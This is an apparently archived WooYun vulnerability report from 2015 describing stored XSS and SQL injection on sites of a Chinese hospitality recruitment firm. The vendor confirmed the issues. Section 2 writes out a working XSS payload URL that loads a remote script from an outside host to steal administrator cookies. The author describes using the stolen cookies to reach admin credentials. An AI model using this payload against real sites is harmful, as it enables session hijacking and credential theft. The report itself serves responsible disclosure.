当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120642

漏洞标题:东方网升多个分站漏洞大礼包#存储xss&sql注射

相关厂商:最佳东方

漏洞作者: range

提交时间:2015-06-15 17:56

修复时间:2015-07-31 14:24

公开时间:2015-07-31 14:24

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-15: 细节已通知厂商并且等待厂商处理中
2015-06-16: 厂商已经确认,细节仅向厂商公开
2015-06-26: 细节向核心白帽子及相关领域专家公开
2015-07-06: 细节向普通白帽子公开
2015-07-16: 细节向实习白帽子公开
2015-07-31: 细节向公众公开

简要描述:

最佳东方与先之培训同属东方网升公司旗下子业务

详细说明:

1.最佳东方XSS
http://vip.veryeast.cn/system/micro
在最佳东方注册企业后,可以发布自己的微站,展示给所有人。
在下面设置标题中只是本地验证了长度,burp抓包后即可以更改,后台未过滤。
弹弹弹:

http://m.veryeast.cn/micro/site/index?c_userid=2277338


QQ图片20150615113752.png


2.先之XSS打管理员cookie,查看各种敏感信息

http://lms2.9first.com/register/company?name=%E8%80%81%E5%88%98&contacts=%3Cimg%20src=x%20onerror=s=createElement%28%27script%27%29;body.appendChild%28s%29;s.src=%27http://xiix.ml/sOg9ag%27;%3E&contacts_mobile=13015648625


很多地方都可以插,然后就有了cookie

QQ图片20150615114011.png


最开始是:

QQ图片20150615092019.png


加了cookie:

QQ图片20150615121551.png


不知为何,使用cookie无法登录管理首页(应该是需要授权码)
然后遍历一下

QQ图片20150615115707.png


各种密码,各种管理员

QQ图片20150615120212.png


3.sql注射
后台这里就存在sql注射,估计是觉得后台很安全吧

QQ图片20150615095731.png


4.先之后台xss(影响较小)
在资料中 http://home.9first.com/myAccount 填写公司的地方完全没有过滤导致存储型XSS

QQ图片20150615011218.png


http://home.9first.com/myAccount


填写姓名的地方,没有完全过滤,应该是数据库中存的源码,显示的时候才过滤,所以细节没有注意

QQ图片20150615011955.png

漏洞证明:

QQ图片20150615113752.png


QQ图片20150615114011.png


QQ图片20150615115439.png


QQ图片20150615092019.png


QQ图片20150615115707.png


各种密码,各种管理员

QQ图片20150615120212.png


QQ图片20150615095731.png


QQ图片20150615011218.png


QQ图片20150615011955.png


修复方案:

过滤过滤过滤,没有过滤的地方太多了,估计不止这几个,另外,不要存明文
没有继续深入,打包了这么多,求礼物!^_^

版权声明:转载请注明来源 range@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-06-16 14:22

厂商回复:

多谢您的指正。
我们会对这类问题做出整改。
再次感谢!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-06-16 16:05 | range ( 普通白帽子 | Rank:153 漏洞数:32 | 这个人有点懒,没有写个人简介)

    @最佳东方 求礼物啊,给点继续挖洞的动力呗